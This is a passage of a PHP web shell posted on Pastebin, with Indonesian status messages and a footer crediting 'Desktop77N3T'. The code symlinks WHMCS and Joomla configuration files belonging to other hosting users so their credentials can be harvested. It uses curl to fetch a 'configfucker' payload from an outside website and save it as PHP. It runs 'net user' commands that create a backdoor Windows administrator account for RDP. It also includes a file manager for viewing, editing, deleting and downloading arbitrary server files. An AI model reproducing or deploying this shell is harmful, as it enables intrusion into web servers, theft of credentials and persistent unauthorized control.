xt');@symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');@symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');@symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');@symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');@symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}echo '<b class="cone"><font face="Tahoma" color="#00dd00" size="2pt"><b>Done -></b> <a target="_blank" href="d7net_grab">Open configs</a></font></b>';}
  1802.     } elseif($_GET['D7net'] == 'configfuck') {
  1803.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1804.     function configfuck($url, $isi) {
  1805.         $fp = fopen($isi, "w");
  1806.         $ch = curl_init();
  1807.               curl_setopt($ch, CURLOPT_URL, $url);
  1808.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1809.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1810.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1811.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1812.         return curl_exec($ch);
  1813.               curl_close($ch);
  1814.         fclose($fp);
  1815.         ob_flush();
  1816.         flush();
  1817.     }
  1818.     if(file_exists('configfuck.php')) {
  1819.         echo "<center><font color=lime><a class='d7net_table' href='$full/configfuck.php' target='_blank'>-> configfucker <-</a></font></center>";
  1820.     } else {
  1821.         if(configfuck("www.chanakyatours.com/package/configfucker.txt","configfuck.php")) {
  1822.             echo "<center><font color=lime><a class='d7net_table' href='$full/configfuck.php' target='_blank'>-> configfucker <-</a></font></center>";
  1823.         } else {
  1824.             echo "<center><font color=red>gagal buat file configfucker</font></center>";
  1825.         }
  1826.     }
  1827. } elseif($_GET['D7net'] == 'krdpshell') {
  1828.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1829.         if($_POST['create']) {
  1830.             $user = htmlspecialchars($_POST['user']);
  1831.             $pass = htmlspecialchars($_POST['pass']);
  1832.             if(preg_match("/$user/", exe("net user"))) {
  1833.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1834.             } else {
  1835.                 $add_user   = exe("net user $user $pass /add");
  1836.                 $add_groups1 = exe("net localgroup Administrators $user /add");
  1837.                 $add_groups2 = exe("net localgroup Administrator $user /add");
  1838.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
  1839.                 echo "[ RDP ACCOUNT INFO ]<br>
  1840.                 ------------------------------<br>
  1841.                 IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1842.                 Username: <font color=lime>$user</font><br>
  1843.                 Password: <font color=lime>$pass</font><br>
  1844.                 ------------------------------<br><br>
  1845.                 [ STATUS ]<br>
  1846.                 ------------------------------<br>
  1847.                 ";
  1848.                 if($add_user) {
  1849.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1850.                 } else {
  1851.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
  1852.                 }
  1853.                 if($add_groups1) {
  1854.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1855.                 } elseif($add_groups2) {
  1856.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1857.                 } elseif($add_groups3) {
  1858.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1859.                 } else {
  1860.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1861.                 }
  1862.                 echo "------------------------------<br>";
  1863.             }
  1864.         } elseif($_POST['s_opsi']) {
  1865.             $user = htmlspecialchars($_POST['r_user']);
  1866.             if($_POST['opsi'] == '1') {
  1867.                 $cek = exe("net user $user");
  1868.                 echo "Checking username <font color=lime>$user</font> ....... ";
  1869.                 if(preg_match("/$user/", $cek)) {
  1870.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
  1871.                     ------------------------------<br><br>
  1872.                     <pre>$cek</pre>";
  1873.                 } else {
  1874.                     echo "[ <font color=red>belum ada</font> ]";
  1875.                 }
  1876.             } elseif($_POST['opsi'] == '2') {
  1877.                 $cek = exe("net user $user D704T");
  1878.                 if(preg_match("/$user/", exe("net user"))) {
  1879.                     echo "[change password: <font color=lime>D704T</font>] -> ";
  1880.                     if($cek) {
  1881.                         echo "<font color=lime>Berhasil</font>";
  1882.                     } else {
  1883.                         echo "<font color=red>Gagal</font>";
  1884.                     }
  1885.                 } else {
  1886.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1887.                 }
  1888.             } elseif($_POST['opsi'] == '3') {
  1889.                 $cek = exe("net user $user /DELETE");
  1890.                 if(preg_match("/$user/", exe("net user"))) {
  1891.                     echo "[remove user: <font color=lime>$user</font>] -> ";
  1892.                     if($cek) {
  1893.                         echo "<font color=lime>Berhasil</font>";
  1894.                     } else {
  1895.                         echo "<font color=red>Gagal</font>";
  1896.                     }
  1897.                 } else {
  1898.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1899.                 }
  1900.             } else {
  1901.                 //
  1902.             }
  1903.         } else {
  1904.             echo "-- Create RDP --<br>
  1905.             <form method='post'>
  1906.             <input type='text' name='user' placeholder='username' value='D704T' required>
  1907.             <input type='text' name='pass' placeholder='password' value='D704T' required>
  1908.             <input type='submit' name='create' value='Go!'>
  1909.             </form>
  1910.             -- Option --<br>
  1911.             <form method='post'>
  1912.             <input type='text' name='r_user' placeholder='username' required>
  1913.             <select name='opsi'>
  1914.             <option value='1'>Cek Username</option>
  1915.             <option value='2'>Ubah Password</option>
  1916.             <option value='3'>Hapus Username</option>
  1917.             </select>
  1918.             <input type='submit' name='s_opsi' value='Go!'>
  1919.             </form>
  1920.             ";
  1921.         }
  1922.     } else {
  1923.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1924. }
  1925. } elseif($_GET['act'] == 'newfile') {
  1926.     if($_POST['new_save_file']) {
  1927.         $newfile = htmlspecialchars($_POST['newfile']);
  1928.         $fopen = fopen($newfile, "a+");
  1929.         if($fopen) {
  1930.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1931.         } else {
  1932.             $act = "<font color=red>permission denied</font>";
  1933.         }
  1934.     }
  1935.     echo $act;
  1936.     echo "<form method='post'>
  1937.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1938.     <input type='submit' class='d7net_table' name='new_save_file' value='Submit'>
  1939.     </form>";
  1940. } elseif($_GET['act'] == 'newfolder') {
  1941.     if($_POST['new_save_folder']) {
  1942.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1943.         if(!mkdir($new_folder)) {
  1944.             $act = "<font color=red>permission denied</font>";
  1945.         } else {
  1946.             $act = "<script>window.location='?dir=".$dir."';</script>";
  1947.         }
  1948.     }
  1949.     echo $act;
  1950.     echo "<form method='post'>
  1951.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1952.     <input type='submit' class='d7net_table' name='new_save_folder' value='Submit'>
  1953.     </form>";
  1954. } elseif($_GET['act'] == 'rename_dir') {
  1955.     if($_POST['dir_rename']) {
  1956.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1957.         if($dir_rename) {
  1958.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1959.         } else {
  1960.             $act = "<font color=red>permission denied</font>";
  1961.         }
  1962.     echo "".$act."<br>";
  1963.     }
  1964.     echo "<form method='post'>
  1965.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1966.     <input type='submit' name='dir_rename' value='rename'>
  1967.     </form>";
  1968. } elseif($_GET['act'] == 'delete_dir') {
  1969.     $delete_dir = rmdir($dir);
  1970.     if($delete_dir) {
  1971.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1972.     } else {
  1973.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1974.     }
  1975.     echo $act;
  1976. } elseif($_GET['act'] == 'view') {
  1977.     echo "Filename: <font color=yellow>".basename($_GET['file'])."</font><br><a class='d7net_table' href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a><a class='d7net_table' href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a><a class='d7net_table' href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a class='d7net_table' href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a><a class='d7net_table' href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
  1978.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1979. } elseif($_GET['act'] == 'edit') {
  1980.     if($_POST['save']) {
  1981.         $save = file_put_contents($_GET['file'], $_POST['src']);
  1982.         if($save) {
  1983.             $act = "<font color=yellow>Save Done!</font>";
  1984.         } else {
  1985.             $act = "<font color=red>permission denied</font>";
  1986.         }
  1987.     echo "".$act."<br>";
  1988.     }
  1989.     echo "Filename: <font color=yellow>".basename($_GET['file'])."</font><br><a class='d7net_table' href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a><a class='d7net_table' href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a><a class='d7net_table' href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a><a class='d7net_table' href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a><a class='d7net_table' href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
  1990.     echo "<form method='post'>
  1991.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1992.     <input class='d7net_table' type='submit' value='Save' name='save' style='width: 500px;'>
  1993.     </form>";
  1994. } elseif($_GET['act'] == 'rename') {
  1995.     if($_POST['do_rename']) {
  1996.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1997.         if($rename) {
  1998.             $act = "<script>window.location='?dir=".$dir."';</script>";
  1999.         } else {
  2000.             $act = "<font color=red>permission denied</font>";
  2001.         }
  2002.     echo "".$act."<br>";
  2003.     }
  2004.     echo "Filename: <font color=yellow>".basename($_GET['file'])."</font><br><a class='d7net_table' href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a><a class='d7net_table' href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a><a class='d7net_table' href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> <a class='d7net_table' href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a><a class='d7net_table' href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
  2005.     echo "<form method='post'>
  2006.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2007.     <input type='submit' name='do_rename' value='rename'>
  2008.     </form>";
  2009. } elseif($_GET['act'] == 'delete') {
  2010.     $delete = unlink($_GET['file']);
  2011.     if($delete) {
  2012.         $act = "<script>window.location='?dir=".$dir."';</script>";
  2013.     } else {
  2014.         $act = "<font color=red>permission denied</font>";
  2015.     }
  2016.     echo $act;
  2017. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  2018.     @ob_clean();
  2019.     $file = $_GET['file'];
  2020.     header('Content-Description: File Transfer');
  2021.     header('Content-Type: application/octet-stream');
  2022.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  2023.     header('Expires: 0');
  2024.     header('Cache-Control: must-revalidate');
  2025.     header('Pragma: public');
  2026.     header('Content-Length: ' . filesize($file));
  2027.     readfile($file);
  2028.     exit;
  2029. } else {
  2030.     if(is_dir($dir) == true) {
  2031.         echo '<div id="content"><table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2032.         <tr>
  2033.         <th class="th_home"><center>Name</center></th>
  2034.         <th class="th_home"><center>Type</center></th>
  2035.         <th class="th_home"><center>Size</center></th>
  2036.         <th class="th_home"><center>Last Modified</center></th>
  2037.         <th class="th_home"><center>Permission</center></th>
  2038.         <th class="th_home"><center>Action</center></th>
  2039.         </tr>';
  2040.         $scandir = scandir($dir);
  2041.         foreach($scandir as $dirx) {
  2042.             $dtype = filetype("$dir/$dirx");
  2043.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2044.             if(!is_dir("$dir/$dirx")) continue;
  2045.             if($dirx === '..') {
  2046.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2047.             } elseif($dirx === '.') {
  2048.                 $href = "<a href='?dir=$dir'>$dirx</a>";
  2049.             } else {
  2050.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2051.             }
  2052.             if($dirx === '.' || $dirx === '..') {
  2053.                 $act_dir = "+<a href='?act=newfile&dir=$dir'>newfile</a> | +<a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2054.                 } else {
  2055.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2056.             }
  2057.             echo "<tr>";
  2058.             echo "<td class='td_home'><img src='"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2059.             echo "<td class='td_home'><center>$dtype</center></td>";
  2060.             echo "<td class='td_home'><center>-</center></th>";
  2061.             echo "<td class='td_home'><center>$dtime</center></td>";
  2062.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2063.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2064.         }
  2065.         echo "</tr>";
  2066.         foreach($scandir as $file) {
  2067.             $ftype = filetype("$dir/$file");
  2068.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2069.             $size = filesize("$dir/$file")/1024;
  2070.             $size = round($size,3);
  2071.             if($size > 1024) {
  2072.                 $size = round($size/1024,2). 'MB';
  2073.             } else {
  2074.                 $size = $size. 'KB';
  2075.             }
  2076.             if(!is_file("$dir/$file")) continue;
  2077.             echo "<tr>";
  2078.             echo "<td class='td_home'><img src=''><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2079.             echo "<td class='td_home'><center>$ftype</center></td>";
  2080.             echo "<td class='td_home'><center>$size</center></td>";
  2081.             echo "<td class='td_home'><center>$ftime</center></td>";
  2082.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2083.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2084.         }
  2085.         echo "</tr></table>";
  2086.     } else {
  2087.         echo "<font color=red>can't open directory</font>";
  2088.     }
  2089.     echo "<center>Copyright &copy; ".date("Y")." - <font color=yellow>Recoded by Desktop77N3T</font></a></center>";
  2090. }
  2091. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top